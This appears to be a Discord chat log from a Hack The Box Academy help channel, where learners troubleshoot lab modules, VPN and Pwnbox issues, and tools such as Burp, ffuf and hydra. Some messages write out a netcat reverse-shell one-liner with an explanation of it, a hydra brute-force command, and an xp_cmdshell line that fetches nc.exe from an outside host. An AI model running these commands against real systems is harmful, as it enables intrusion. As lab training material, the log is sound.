#modules
Sure when is the best time for you? I'm currently trying to upgrade my vb right now
I'll just shoot a question when I have one
Hi all, quick question. Anyone else have issues using proxychains?
the module? which part?
Hi. Module "Using web proxies", section "Proxying tools" proxychains doesn't really seem necessary specifically, besides being shown as a useful tool, so i've been experimenting with it for the last couple of hours.
specifically, using 'proxychains curl <whatever.com>' will return what you ask of it, provided the proxylist in '/etc/proxychains4.conf' is present and has 'some kind' of valid ip in the proxy table, but traffic does not seem to route through that proxy at all, and basically just runs a curl
that part?
ya ive already figured out that 'https' is not a valid schema for the config
it only accepts http, socks4, socks5 and raw
i happen to be using ZAP, but it catches 'curl <whatever.com> --proxy localhost:8080' no problem
so its not a matter of curl through proxy, but a matter that proxychains refuses to forward through the localhost at 8080
also tried install, uninstall, restart after config changes, running as sudo, praying for rain, peeing on my shoes. etc
you can see the curl run through zap tho right?
only when running curl --proxy by itself, but not with proxychains
I think that is what it is useful for. So if i run metasploit through the proxy I can see what metasploit is sending and receiving in burp or zap
right. Zap catches whatever i send to it, so the problem is specifically with proxychains and how its handling traffic. doesn't really seem to be much info after googling for an hour or so, so I'm guessing proxychains just doesn't want to cooperate for whatever reason
/rank
huh that was weird
How are you determining if traffic is being routed through the proxy?
'$ proxychains4 curl ifconfig.me/ip' -- curls and returns info from ifconfig.me no problem. Shows no traffic in ZAP
'$ curl ifconfig.me/ip --proxy localhost:8080' -- curls and returns info, but shows traffic in ZAP
zap is just monitoring the localhost 8080 right?
hmm not sure
also should mention i've tried 'proxychains' and 'proxychains4', as well as saving the .conf file with different editors, using different .conf configurations
Ya, long shot, I've basically tried almost everything, its really a nothing problem, I'll probably never use it even if it did work, but the fact that it wouldn't has been driving me crazy since lunch
I appreciate all the help though.
ya sorry I couldnt be more helpful, I only thought about using it to reroute stuff through burp and zap
I havent used it since the module tho either
I've seen how it can be really quick and useful for quickly routing stuff, and multichaining it with other services and proxies, so it seems like cool stuff. Lol ya i figured if it did work it would've at most been 'oh thats neat' then i wouldve forgotten about it immediately
I used apt to get it, I might try using different builds from the git repo
Anyone around to answer a cross site scripting question?
you appear to be correct, it's going through the wordlist I think 87,649
I was going to leave it til tomorrow, but I know I would have forgotten what you told me unless I do it now
what does COOBS mean precious?
oh it's zero cubes for the exercise
lol its the principle of the matter
but the knowledge I definitely need to know
So I receive output, but that still doesnt give me the answer to the question? HTB sure is filled with riddles
WHO PING
hey can anyone help me with this question
"Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, unzip the file, and run "hasher upload_nix.txt" from the command line. Submit the generated hash as your answer."
Linux File transfer methods section of File Transfers
I uploaded the file to the machine and ssh'd into the box but there is no unzip command on the machine. is that intentional?
What if you unzip it on your machine, transfer it then run the command?
i tried that but it says incorrect when i submit it
i got it had to use another zip command
Nice
hey. im in the web attacks module at the bypassing encoded references section and i kinda stuck. i should URI decode some thing which i'd want to do in the console but so far i haven't found a command for that. pls help
you bunch of mother FUZZers!
which web attack module? which question and answer?
im just now doing ffuf, very slowly
Any news on new modules? It's been a month without courses so far.
why have you completed them all?
I need a full time mentor to help me through all of them and it appears you're just in time!
@sly nebula
im just kidding of course
Hi all, I'm doing the "Using Web Proxies" module and on the ZAP Scanner question it says that I should get a high level vulnerability which I should use to read the flag but I'm only seeing medium alerts. I'm using the built-in browser of ZAP. Can anyone pls give me a hint? am I missing something?
Can anyone tell me about how long it takes to populate the CPEs list once you've completed a module or 2?
Hello together, I have big troubles with the performance of the academy machines. Very often my VPN crashes (every 2min) and reconnect, but the machines are a long time not reachable. This sucks hard. Is this normal and this with an VIP account?
Yesterday, it was actually not possible to work with the academy module. VPN was connected, but the machines were nearly not reachable over hours...
I know some others had the same problem, but after they re-downloaded the VPN profile / ovpn file again, everything has been working fine today.
Im the same situation with the academy, im using pwnbox though, been trying to reach support for over an hour, took them 20 min to reply, wrote 2-3 things then they stopped answering again. Not impressed
Thx, I actually tried it with no success
are you using a VM and is the network set to NAT, then try in BRIDGE mode, that can also help a lot.
yes, i actually tried pwnbox too, with the same problems. Seems they have big problems with anything...
VPN key for academy is different than starting point. Make sure you are using the correct one. Or download a new key and remove the other ones. If you run two VPNs at once, they will cancel each other out.
if you're using linux also, make sure it's updated and upgraded
thanks for the hint, but thats not the problem. A friend I worked with had the same issues, not so bad like me but with breaks every 10min
Its a Win10 with virtualbox on NAT mode. VM is a Kali
I actually cannot set a bridge mode, how an other member described. Virtualbox shows no options for an adapter. Seems an steady problem with solutions, but I could not fix it yet, to try this
and it works fine with the normal HTB platform, without so big problems. Its a problem with the academy
How to change VPN in Academy? With pwnbox there's only one instance to launch and no settings. And one button to start the target machine, im only using their stuff none of my own. Still doesn't work
In virtualbox you just got to setting and network preferences and switch NAT to Bridged, thats it
there is a dropdown that has about 5 network categories
can you upload a screenshot?
of course, I know this all. I cannot choose an adapter, its empty. Its virtualbox issue I have to fix somehow. First tries dont work... but thats not the problem, it works with normal machines
in every module on every page with an exercise there is an option at the bottom to download a new vpn key
Gimme a sec, I got you.
This guide is about virtualizing Kali Linux inside of VirtualBox, allowing you to have a Kali VM. This is a great way to use Kali, as it is completely separate from the host, allows you to interact with other VMs (as well as the host machine and other machines on the network), and allows you to revert to snapshots.
reinstall a new kali linux using that link as your guide
@agile oriole
Unfortunately there isnt. I have Full screen, terminate, reset and extend life. Only buttons there are
On target I have reset only.
Below this there's only the exercise question, nothing more
show a screenshot
working on it
they are not in each page
ah, going from module page 1, brb
did you find it sh333p?
Ok yea found a page with download new VPN key, now im trying to install it on the pwnbox
But im not using a vpn to connect to the academy?
I mean with pwnbox it should all be on their side right?
Thats why I got it, to avoid stuff like this :p
Thanks for your help though
yeah, I didnt realize you were using Pwnbox until now
you're not using a virtual machine then
No no
there are many people who claim Pwnbox gives them no issues, I am not one of them.
It was working without no problems for me for two days, now it wont work at all lol
I changed from one course to another, thats the only thing ive done except for following along in the sections
Yea I use windows
Ok, it seems to be fixed for me. The difference I see now, when I spawn a target it doesnt show the ports like it does in my screenshot above, only the address (as it should I guess)
So support guy did something, not sure what but it looks like he managed to solve it
What a relief, thanks again for helping out @muted kite
sure sounds like I just kept you distracted while the tech guy worked
he didnt respond for a long time so I thought he had gone home
Well now we all know tech support does work
And its broken again, something is definitely up lol. This time ill wait in the support chat :p
Ok, i reinstalled Kali, vbox, everything. And yes, it works now. I cannot imagine what the problem was, cause it works for normal htb machines... and pwnbox does not work in the academy either...
so your able to move forward right?
got a new vpn key and all that?
sometimes it just all comes together
another happy customer...
i am having this problem where my machine is still running
how can i deactivate it
any ideas
??
yep done that
i got disconnected temporarily
are you on a virtual machine?
the vpn is disconnected but still its showing active
yes
what does the terminal say?
type ifconfig tun0
'ifconfig tun0'
does it show the vpn ip address in inet?
nope its not showing
i downloaded it at first connected my vm then got disconnected
now its not reading any inpys
inputs*
you must run the vpn from your terminal before you start the machine
sudo openvpn starting_point_ovpn
or whatever the name is, once it's connected, then you start the machine
show me your ovpn file
in a picture
go to your terminal
push connect to htb -> choose server -> download openvpn config -> in terminal openvpn 'name file'
In terminal command: openvpn 'name of downloaded file' and run
ok
Anyone know if there's a known issue with the web apps module and the HTML injection question? It tells you to write HTML to make a link say Click Me. It's easy, I tested it on the server, but when I put it in as the answer it gives me the middle finger.
next on website HTB push button connect to HTB
<img> ?
That for me?
yeah
yes
Stand by
it wants something simple like that I think
yes all done but finally getting a last error
but it's the same machine which i'm trying to stop
IZROTH what are download?
I got it, it was dead set on me using www in there. Picky syntax...:-D
i mean file for machines or for starting point?
starting point downloaded
hmm
initialization sequence completed
Hi, I am having some trouble with footprint lab-hard, I have found the private key, but I am having trouble when I try to use it.
do you mean fingerprint or idk i never heard of a hard machine/box with a similar name
done it
and?
No footprinting module
screenshot of terminal and HTB screen?
your vpn is connected now you must spawn the machine
leave that tab open so long as you spawn the machine
the machine is loaded, try to work on it now
not sure what you mean by that
i got temporarily disconnected i was doing my tasks but as soon as the connection went off the access to the lab paused i can no longer access the lab
it says you're connected to htb and it also says your machine is spawned
click starting point
in green
but i lost the previous machine
yes the reload or stop both are missing
ok
anyone around to offer guidance on the last footprinting problem?
DM if you still need help
I'm having trouble using powerview in the AD module and could use a hand, think I'm missing something pretty simple here but not sure what
what module?
im looking one sec
Feel free to DM
Anyone around to answer a question on the Linux Priv Escalation module?
alright I got it dm me
++verify
Please see your DMs for instructions on how to verify your HTB account.
Im stuck on the 3rd problem too and could use a pointer if you are free
@livid pier you can DM anytime.
I am stuck for a while now in the Web attacks - Skills Assesment. I found the first step. I understand what I need to do next, but don't know how to achieve that. Can anyone help me?
Anyone else get tickled when their target machine starts running out the clock, and you manage to figure out whatever with only a couple minutes to go? xD good stuff
Hey Guys
I'm really stuck on the FFUF module
Is someone out there that have finished it willing to help me?
Pls
@woeful oxide sry m8 haven't done it yet
linux priv esc module > Cron Job Abuse > "find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null" can someone explain me why we are using -path /proc, and why proc directory Thanks.
Im working my way through that mod too, and no it isnt easy..
I will try and help you, once I've completed it
Hey, Just a quick update that is worth noting. We have recently updated to an improved version of Pwnbox. With that is one change you may want to know about regarding using sudo and running commands as root. You will need to use the password that is located in the credentials file on the desktop. This gets autogenerated when you hit start instance.
Awesomeness!
Pwnbox just came out with a new version read up
Wondered where those desktop credentials came from, thought I'd just been overlooking them
Ya we upgraded Pwnbox. Its similar to the one that runs on the main HTB site now.
Me too
any IT?
is it a thing that most target boxes on the vpn block icmp requests?
Have you found a solution? If not, feel free to DM me
I need a sanity check for one of the powershell LDAP enum module questions if anyone's got a sec, feel like I'm answering everything it's asking for the filter but nothing's really turning up
Hi all. Just starting with the Academy. I've hit my first roadblock with Burpsuite. Once I enable Burp in Firefox in the Pwnbox, I enter the generated target IP/Port. Burp doesn't get anything in the repeater after forwarding. I'm following the instructions verbatim. Have there been other problems with this recently?
right click and send to repeater

I know I hit Ctrl+R like the tutorial said, and that didn't do anything. I'll try with the right click when I get back to it.
My bad i misread your initial question I thought you weren't able to get something into repeater
Burpsuite gives me lots of issues @livid pier
i dont have issues with burp, i find it to be smooth, I have trouble with zap
zap looks like it give some abilities that burp doesnt have with the free version so I try to use it
What kind of issues do you have with it?
Like webpage is not viewable with intercept on. Gotta turn proxy off or it doesn't work
Issues with decode
I probably need a full course on it
@muted kite I've been banging my head against the wall this past week on the webproxy section, it's hit and miss sometimes between burp and some of the tools you're supposed to use. Just found out zap doesnt have ascii encoding as a processor function in the fuzzer. mfh
Sometimes I get the burpsuite cant load this but i think that is a connection to htb server error, I have never really used the decode feature
@livid pier Besides the one persistent file, our pwnboxes aren't persistent right? I know I've gotten update reminders every time ive started it so maybe its just a software issue
*burp update reminders
True
I am using kali, when I get the error I hop over to a pwnbox and the error goes away
super annoying before I knew what the problem was, I thought I was doing something wrong, but I would enter the same code on the pwnbox and it would work
Kali Linux is different. It has so many problems with functionality, it's powerful and over useful
Can't use Pwnbox to hack evil Corp can we now?
it runs pretty smooth for me, im always amazed by it
I think backtrack was better
before my time
Kali is fully loaded with apps and tools
With everything and more it seems. ITs almost overwhelming it has 100 tools and Ive used like 15
When im done with academy Im going to try to spend an hour or 2 with a new tool each day
thats 6x as crazy
@livid pier @bitter bear that's because the browser's failsafe is tripping since burp's a mediator between your client and server but not trusted at that time since you haven't downloaded burp's cert and uploaded it into the browser's trusted certs. You aren't getting the error on pwnbox because htb staff have the cert already plugged in on bootup
I can try and find the url for the cert
Or better yet find a tutorial on adding it
Is there a link that shows how to do that?
I'll find one
Not as hard of a process as I made it sound
Yep
If you'd also want my advice if you're starting out on htb, buy a month of vip to get access to retired boxes and watch ippsec's walk-throughs on YouTube. Best part is he explains where he stumbles and why what works works/vice versa
@muted kite @bitter bear ^^^
Thank you, I've added it to my favorites
yep
The process for adding it is in one of the modules too
Also did not mean to ping you my man lmao
sry about that
myeh whatevs
@livid pier @muted kite @bitter bear feel free to DM if yall have questions about burp
Thank you
yuh
i will homes
Thanks a bunch! You live in here or what? xD
Umm, yea
hello I need your help I need to hack an account who can help write to yandex.direct
I think you are lost
Anyone got any idea why I can't upgrade the tty?
@unreal flume You are using zsh if I am not mistaken?
If so, the trick is to run these two commands as the following:
stty raw -echo; fg
Otherwise this upgrading trick won't behave as you would expect it on bash.
Welcome anytime
attacking web applications with ffuf, but my pwnbox shows that ffuf: command not found?
sudo apt install ffuf
Look at your desktop, there is a text file with credentials, use the password you find in there.
ok installed and works thanks
the password is also displayed in the URL - which can come handy
hello, can anyone help with this.
i keep getting this only for all commands i am trying
Its active subdomain enumeration section in Information gathering module.
That LDAP enum?
are passwords for a user stored in id_rsa?
I am on a module and dont really understand ssh keys
Any particular Module you're referencing?
or is it a general connection question?
getting started module
but I figured it out now
@carmine quail well my id_rsa is saying invalid format when tryna ssh into root
glad to see you figured it out - let us know if you need any other help
@carmine quail
When I try to ssh root@167.99.89.198 -p31468 -i id_rsa it says invalid format
weird - I can't say I've run into that one. I've seen one that says your permissions are wrong, but not that the key is an invalid format
I did have the permissions one but I done chmod 600 id_rsa and it solved that one
ok, but usually it needs to be 0400 - I think...
oh lemme try that
What do the numbers even mean? @carmine quail it didnt explain
and yea still says invalid format
hey I am stuck on the "live engagement" of the shells module. I know i am executing the right exploit but the payload is not executing and i think it might be an internal error or something. i can explain more details but didnt want to use any spoilers or anything
Ive had trouble with this too, I hate using that vpn in the module too
yeah the noMachine is painfully slow and seems like it may be the issue thats causing file uploads to not work
Well i have been putting off finishing that shells module, I will start it now and let you know if I can get any of those shells to work
awesome thanks man ill keep plugging away and see if i can get it to work
Good morning my brothers and sisters. I am stuck. It happens, but I tried and I tried and I can't quite make it.
Login Brute Forcing Skills Assessment Website question #2
I am looking for a flag using Hydra.
My user is -l user
My password file rockyou-10
Running http-post-form on the admin_login.php page.
user&pass is what I found in burpsuite.
So user=user&pass=^PASS^
Then the delimiter
:F=200 (not 404 not found)
No luck cracking the password...
Now if I do mistype there will be a list of honeypot illegitimate passwords listed, 16 I think.
If anyone has any insight please reply to my message or DM me. Much love to all of you today, enjoy your weekend.
hydra -l user -P rockyou-10.txt -F 127.0.0.1 -s 33000 http-post-form "/admin_login.php:user=user&pass=^PASS^:F=200"
Example.
Of my most hopeful failed attempt.
Im stuck there too, let me know if you get it. I also cant get the login forms attack section, i run hydra and find the username and password combo then try to enter it and it doesnt work
Goodluck
I will have to go back to that soon
Yeah... If I can skip this and try the service login page and come back to this later I will. If I'm successful with the service login I will definitely let you know see if I can guide you to the right direction, but that's to be determined of course.
Thank you! I will get to it once I finish this shells module
hi guys.
Is there someone that can explain me this command i met in the htb academy module "getting started"?
host 1 is not working no matter what i do, tried vector #1 with tomcat and exploit worked but payload didnt execute and then now tried vector #2 on the status page and i bypass the upload filter but get a 404 when i try and navigate to the /files/shell
yeah what is it?
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
is used to start a reverse shell
i can't understand the beginning and the end
all the stuff around the tmp folder
so that is a one liner to start a reverse shell as you said. it removes anything in /tmp/f if it exists then makes a FIFO (first in first out) file in the tmp/f folder then it pipes what is in the /tmp/f folder to /bin/sh which is essentially bash and redirects standard output and error (2>&1) to netcat of your ip so your computer through netcat can see the output and error of commands
anyone correct me if i said anything wrong please^
what does tee do?
so why i have to create a piped name with mkfifo and redirect to nc?
is not enough just to use the nc part?
Thank you!
i've tried uploading just the nc part but the behaviour is quite strange!
that is a good question, i am not 100% but i think it is to run commands through a file in the tmp folder where you have permissions so you use netcat to write to the file and then use the file to execute commands
i might be wrong so dont take that as gospel but i think thats why
Hi
mmm... i don't know
why i can't send message in genral channel?
Have you verified?
i've appended this line in a file that can be run with sudo without the need of a password. if i append just the nc part the shell that is launched has a strange behaviour: i have to type in the target machine to have an answer in mine!
Idk
okay, thank u
anyways thanks for your help
interesting yea its always interesting to play with stuff like that, now you have me curious so imma look into this more
you ever need help feel free to dm
insufferable
tell me about it lol...its unusable almost
Please see your DMs for instructions on how to verify your HTB account.
hey, why I got 1020 error when I get into hackthebox website? :_)
were you trying to ddos the site?
Hi, I know this question has been asked several times, but I can't get firefox to work at all on my workstation; it won't connect to anything. I tried changing the proxy settings, but nothing I do has worked. I'm really new to the academy and am stuck on the burp introduction.
DO you have a paid account?
I have the free account
you dont get internet access on the free acount
So it'd be impossible to do the task without a subscription?
No
If you are trying to connect to a box within the network you should be able to connect
I'm from Iran, is it boycott for Iranian?
Try resetting your box. Meaning if you're inside the browser running the virtual machine there just reset it.
It should go back to the default State and hopefully it'll work for you again.
I tried that, but it didn't work either (
making any progress?
Try #613049811481919508 ??
i kept trying a couple different things and nothing really worked so im going to take a break and try more later
did you try the metasploit and the manual upload with msfvenom?
Hi, I am stuck at the "Attacking Web Applications with Ffuf" module - Skill assessment. I try to find the page which says "'You don't have access!'". But when I run a recursive scan I get 1000 of results and I dont know how to properly filter them cause they all have the same size etc. A tip would be greatly appreciated. Thanks in advance
-fs tag
if the most prevalent size was 1000 you would -fs 1000
y but they all have the same size
I tried both
I just gave up again
It disconnects every 2 minutes needing 1 min to reconnect
I almost went crazy
yeah i feel that
I think part of the problem is im not sure how to set up the listener
Should we use that ip? when i ifconfig it says our ip is 172.17.0.1
But its impossible to experiment because it freezes after every keystroke
Do you need to switch network configuration to install ftp, etc in the Starting Point Pwnbox? I can't reach the repos to install them
You cant connect to the internet with the free service
It should have everything you need
oof, its saying that ftp isnt installed. Tried multiple boxes
hmm they just updated the pwnbox maybe they forgot something
command is just ftp right? Like 'ftp -h'
ya
Sorry to bother you but where is vpn key in module , it is gone ??? I would like to connect my VM with
I agree for pwnbox
it's nice starting out but you'll find pretty quick it's missing a lot of stuff/isn't updated the further you jump in, but still v nice
It's slow and copy/paste doesn't work....

The copy paste not working kills me
I found a good guide to download the virtual machine and install kali if you want
I'm also part of the "Can't copy and paste into Pwnbox" club
It pains me
K A L I B O Y S
It doesn't work for me..
But do you use VPN ?
To connect to the 'victim' machine? yea i will
where did you find the vpn configuration ?
pwnbox doesnt need it
I havent set it up yet but I think the walk through for meow shows you how
To do it with kali, top right it says connect to HTB, then click starting point, then open vpn
download that file, then run sudo openvpn startingpointfile.ovpn
I did it
You can download the VPN Key for the Academy here:
https://academy.hackthebox.com/vpn/key
It works, thanks !
Hi all - Supernoob beginner here so apologies for the simple question...
I'm doing the Learning Linux fundamentals course on the academy (which is great) but i'm running into a brick wall. I'm using the pwnbox to follow through with commands which works generally OK however when i use sudo it's asking for a password... For the life of me, i don't know what that could be..
Its on the desktop
its also in the url
The password is written above the vm window on your right pane, also on the desktop of your kali in a document
I could use some help with the final question for bloodhound fundamentals
I've got a question with academy
For students, is there anyway they can buy the student package
and get access to tier 3 modules?
Like priv esc?
I dont think so, gotta buy cubes
I am planning on paying for one month $68 for 1000 cubes
doesnt make sense to buy 1000 cubes for $100 when I can get 1000 for $68
Im also poor tho
The real question is tell me why on the web attacks module the question says search the first 20 people for the flag and the 21st person has the flag. wtf mate?
or maybe 0 doesnt count
There's one with $38 isn't it
Anyone know why the accesschk command isn't available on the target box that I'm working on?
Nvm
does anyone know how to resolve this issue?
Hi, I have a question regarding the web proxy module
Copy paste of image doesn't work here ?
Anyway, in the skill assessment questions, 3rd question, we have found and decoded the cookie that a web page gives us, and now we understand that this 31 bits cookie is a 32 bits MD5 hash missing one character that we would need to find using the fuzzer
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
what's your question?
I'm trying to think about the right way to explain it
Euhm
I understand how to do it, and I understand that the result will be a list of cookie (one for each combination)
but what should I do with that ? How can I come to know which character was the missing one
well yes and no, you'll only have one full cookie that will let you access the page
do you know what "fuzzing" means?
you're fuzzing the last character of that cookie so it's a proper md5 hash
in other words, you can see the hash as a 32 character long password, and you only have the 31 first chars, what would you do?
to send it in the post request ?
yeah that would work, or generally just try to interact with the server using the newly created cookie
I'm not sure I got it
So the purpose is just to interact with the server (so let's say send a get request) with the new cookie that we find from the 32 bits hash ?
and once the right cookie is sent to the server, I will be authenticated as the admin ?
yes but you can only find the proper cookie by sending it to the server, for example a page that requires to be logged on
alright
if the cookie is incorrect you usually get a forbidden and/or a redirect
so if you just get the page, that means you have the proper cookie
and yes as it's the admin's cookie you would be admin
So, if I understand correctly, along with my attempts to send a get request with the cookie, I'll either get an error, or the admin page ? Those are the only two possible outcomes ?
I feel like when I tried that, I just got as a result the same login page as the response
But I'll try again, maybe I did something wrong
that should be correct.
Alright it worked, thank you very much
Is anyone else experiencing problems with the sql injection module, second paragraph (SQL Statements)? I just finished the previous question and it worked fine. After spawning the new target in the IP isn't pingable, neither responding to my attempt to connect with mySQL. Google is pinging.
Tried it out. Same problem here...
Can someone explain to me how to locate the flag.txt in the public exploits module? I have attempted to Nmap to my target machine and when searching for exploits in Metasploit I can see an exploit for the simple back up plug in on the site; I run it after setting RHOSTS and RPORT but get a general directory with no real access
Ohh that's weird. Thanks for letting me know man! I've been attempting to troubleshoot this for a while now ahaha
Still looking for help if anyone has sees this and has any insight please DM me.
Thanks
Feel free to DM me for assistance on Shells & Payloads when you get time and if you still need it.
@sand falcon That's a weird one. Your command syntax looks correct... wish I had a better answer for you lol.
i have no idea what's happening here
@sand falcon pls be careful with spoilers, i have to remove your screenshots
oh god, sorry for the mistake. can you please gimme the answer for that
no because you won't learn anything from it
its not about getting the answer its about understanding and getting your way to the flag
(in Russian) Guys, are there any Russians here?
(in Russian) No
@rustic sage @sand falcon only English pls guys
ok
sure. @drifting knoll
so can you explain why it happens? because i thought cme would be a great tool. but now i have conflict
can i DM to you @drifting knoll
troubleshoot it
compare the results and network traffic from cme and the tool that worked for you to get the flag
woh that's a great idea. let me check
Stuck on firewall evasion also for a week now. I found two open ports but the versions displayed aren't the correct ones. The search continues.
@tough quarry DM me brother
still unable to figure it out. traffic was encrypted. totally mess with my mind now
We want to remind all of you of the rules regarding PMs and that they are for good reasons.
We want to support you all and help you learn quickly and a lot. However, the hundreds of PMs a day slow us down because contacting a staff member without permission is for technical emergencies (related to the modules in this channel) only. We always pay attention to that. In addition, as developers of the modules, besides supporting you, we also work on new modules, develop VMs, improve the concepts and try to make it as close to reality as possible for you, which requires focus and high concentration. Therefore, pinging or PMing is a distraction and delays the development process, and as a result, you will have to wait longer for new content.
If you ask a question here or get stuck, communicate with each other and help each other out. Teamwork is essential in this area and requires practice which you will get from it. If we developers don't respond to your questions, it doesn't mean that we ignore you, but rather it's a reminder to read through the content again, try to understand the concepts and functionality, and look for ways to solve the tasks. In real situations where you will face similar challenges, it is crucial to learn to deal with these situations and to be able to research for them because no one will give you the solution in that real case. Again, this skill can only be learned through practice in which you develop your own problem-solving methodology.
Therefore we ask you not to contact us for no reason but only in technical emergencies or with explicit permission. Don't take away each other's experience but help each other to train the analytical skills to develop new ideas that will help you in the future.
Good evening, I would need help with the "getting started" module, I am at the public exploits and I am asked to find the services running on the server so for that I do an nmap -sC -sV -Pn <ip target>, which gives me a port used by nginx. At this point I don't know how to find the exploit, the clue is: search for plugin exploits, except I don't know how to search or refine my search
Maybe you are looking way too far. What web application is running on the web server? Can you extend this application with plugins?

How can I know which application is running on the web server?
Open your web browser and type http://<ipaddress> into the address field.
If the web server is running on a different port, just append ":<PORT>".
hello bro, I want to ask how to run http.server command in linux? I've been looking for the command to not produce results in my linux, is there a solution?
this? sudo python3 -m http.server 8000
8000 would be the port
I've experimented with that command, but the http.server command in me doesn't exist.
what error do you get when you run it?
python3: can't open file '/home/cyber4rd/Documents/HTB/Archetype/http.server': [Errno 2] No such file or directory
I mean the file doesn't exist, how can I get that file and then run it?
you are doing something wrong - probably trying to open file with that name based on error you pasted
python3 -m http.server 8000 <-- this must work for you without sudo since its unprivileged port
yes you really, all I got was no file and I had to get the file
Looking at the path it doesnt look like it should be there
thank you bro
I would try other things first tho
Where are the rest of your python files?
if you misspelled module name it would throw different error (No module named <name>) so you must omit something from commands above
ok bro I understand, thank you once again for the solution
Is there some obvious reason I'm missing that pwnbox can't seem to install ftp using apt-get install?
do you have the free version? It wont connect to the internet
@livid pier That's it. So it looks like I'm paying for the service or using OpenVPN then, yeah?
I'm stuck on the Linux Priv Esc final section if anybody is around that can help me out. I have Flag2 and Flag4... but I can't seem to get Flag1. Any push in the right direction would be helpful.
Hello everyone, regarding the Meow exercise, I've obtained the hash or flag.txt info...But when entering into text box on HTB, it shows incorrect flag!?
nvm 'HTB{}' was necessary
Can someone give me a hint on the skills assessment of Sqlmap Essentials? I have scoured the site and caught the blind reference but I cant find any parameters to attack.
hello
Hello how can we help?
Hi
wanna learn how to hack android mobiles
anybody who can help?
Just find an 0-day and you're good to go (edit: let it be clear that this is a joke as your question was way too vague)
doesn't help you to learn anything rather you can get in trouble using it
Also please read #rules, we do not entertain illegal activities
If your question is about getting started with android hacking you'll find many resources in #resources-tools
Also in #binex-rev and htb has a couple challenges for android
at the moment we don't have any mobile specific modules but we recommend you to get familiar with the basics first https://academy.hackthebox.com
anyone around who can give me a tipp for Skills Assessment - File Inclusion/Directory Traversal module ? I'm fishing still in the dark
hi, can someone help me ? i'm about to buy cubes on academy htb and i want to know if i buy monthly plan, will i still have lifetime access to modules that i bought ?
maybe use the chat on the page for this answer
hey just wondering, are there any plans on making cloud pentesting modules?
yep
oh snap awesome! any eta or is it too early to say?
its too early for now
oki, thanks anyways! will be waiting:)
One of the suggested tools doesn't exist anymore. Unsure how to figure out how to replace it
It's the module getting started
Anyone to answer a question on web attacks- advanced file disclosures? - nvm I got it
Has someone finished Value Fuzzing in FFUF Web Attacks?
what wordlist did you use?
Anyone here that can help me with sqlmap essentials? Stuck on the final skills assessment.
NM I found the answer myself. Just needed to enumerate the page better to find the vector.
Hello everyone, could you guide me on how I could face the solution of an SQLi exercise, if this is not the channel where I can consult, it tells me.
+1
stuck on this task for a few days.
first I thought I found the password but actually it was some hydra "bug" (maybe funny restore point).
but currently searching for the real password... already tried 25 wordlist that can be run in max ~20 min. no success..
if you are still stuck on flag1 you can DM me.
Ya its so weird, I will run it on the same webpage 10 times and it will give me 10 different username password combinations
I had a problem with hydra and googled "hydra false positives" - top entry mentioned " Also sometimes due to high number of threads the page doesn't have time to load giving you false positives always try to decrease thread count." - not sure everything is believable on the great internet...
anyone knows how we can reset the academy module back to 0?
Task: in the 'titles' table, what is the number of records WHERE the employee number is greater than 200000 OR their title does NOT contain 'engineer'?
My request: SELECT * FROM titles WHERE title != 'engineer' OR emp_no > 200000;
But it doesn't work...
Somebody can help me?
Also tried: Select * from titles where title != 'Engineer' || emp_no > 200000;
But the answer isn't correct
read the 'DOES NOT CONTAIN 'Engineer'
So it doesn't exactly just mean the string 'Engineer'
So what do you think is next?
Isn't with the != Excluding the 'Engineer'?
yes
But just using != Engineer is only checking the exact string
what did you learn before this? what does % do?
Is the "like" operator
yes
I think if i use "%Engineer%" maybe it works right?
Okay, let me try
Can i send you dm?
sure
okey the more i work with getting started, the more i get a sense it's slightly outdated
anyone i can ask for some guidance on the getting started module?
A good idea is to do some of the prerequisites modules, that will help you.
Or else just ask here...
okey the issue is that i am on the windows part of getting started
it says windows 10 module
the link gives me a windows 11
virtual machine that is
what is the right step?
it does not matter if it is a Windows 10 or 11 for the things you need to do
okey thanks. it's just stuff like that is throwing me for a loop when i am at the start. i hope you understand
has anyone here done intro to network traffic analysis?
Help on the question before those two! please been stuck need a slight push
which question are you stuck on ?
Send dm if you want
Find and submit the contents of the TXT record as the answer.
if you "dig" into it I am sure you can find the axfr record you seek
cheeky clue
Thank you everyone, Happy hacking!
@twin raft be careful with spoilers
np
Which section of that module is that?
Subverting Query Logic
I've put my injection in right way i think, but when i do the login it says: "login successful as user: admin"
And i don't want to be admin, i want to be tom, and i don't know why this happens
So then it isn't right :)
Have just tried it my own.
You can log in as 'tom' and then you see the flag.
Jajaja it's what i think but idk why
The app is showing you how your query was sent to SQL
can anyone help me with using LinEnum script after getting a reverse shell active on a remote server? the script executes but the output is so long i cant read it all and i cant scroll up to look through it on the remote host.
the script automates what you should have looked at in a target so you have to read through the output to find something that can be useful
good stuffs can be everywhere in the output of the script
right but my problem is that its not allowing me to look at all of the output, its getting cut off and only shows the end of the output
try to put the output in a file
./LinEnum.sh | tee "youroutputfile"
or LinEnum.sh > "youroutputfile"
.
once i do that i can pull the file off the remote host somehow to my attack box?
and then can view it?
why? you are unable to read the file directly from your target
?
you're welcome
Anyone online that could give me a helpful nudge with the Broken Authentication Final Assessment? I can't find any other users.
read all the webpages very carefully
Hello, i have a question about the SQLMAP Essentials module, specifically with Case5 question. I am able to perform the process but i am not getting an expected answer. DM's are open if anyone is around so i can more clearly state my question
Disregard this, i had to reload the target and it worked.
Starting Point - Archetype: NetCat issue.
Hey again, I've been having issues running NetCat on starting point tier-II on the Archetype machine.
I try running :
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.155/usr/share/windows-resources/binaries/nc.exe -outfile nc.exe"
What I receive in python3 -m http.server 80:
10.129.230.107 - - [24/Jan/2022 21:52:48] code 404, message File not found
10.129.230.107 - - [24/Jan/2022 21:52:48] "GET /nc.exe HTTP/1.1" 404 -
I also tried :
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.155/nc.exe -outfile nc.exe"
What I receive in python3 -m http.server 80:
10.129.230.107 - - [24/Jan/2022 21:54:06] "GET /usr/share/windows-resources/binaries/nc.exe HTTP/1.1" 404 -
I wanna install seclists, what is the pass for sudo?
This is the wrong channel. It will likely not be answered. Go over to #starting-point
thank you!
on kali it's kali
na I mean for the htb box
